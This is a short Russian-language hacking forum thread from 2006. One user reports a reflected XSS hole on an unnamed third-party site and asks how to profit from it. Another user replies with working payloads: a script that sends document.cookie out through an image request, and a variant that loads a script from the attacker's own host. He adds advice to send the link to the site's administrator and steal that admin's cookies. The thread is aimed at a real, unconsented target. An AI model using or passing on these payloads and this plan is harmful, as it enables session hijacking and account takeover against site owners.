Помогите разобраться с Xss

Discussion in 'Песочница' started by LoFFi, 23 Feb 2006.

  1. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    Я вот тут нашел сайт левенький, и через некоторое время нашел дыру XSS

    http://www.......ru/news/index.php?param=1<h1>XSS</h1>

    Только вот подскажите что я с этого теперь могу поиметь и как.
     
    #1 LoFFi, 23 Feb 2006
  2. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    #2 Electro, 23 Feb 2006
    Last edited: 23 Feb 2006
  3. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Это пассивный XSS. Можешь вписать туда <script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script> если не фильтруются какие-либо спец символы. Если фильтруются можешь сделать так <script src=http://твой сайт/xss.js></script>Где в xss.js записано img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie; И дать эту ссылку админу. Если он лопух, получишь его куки.
     
    #3 Azazel, 23 Feb 2006
(You must log in or sign up to post here.)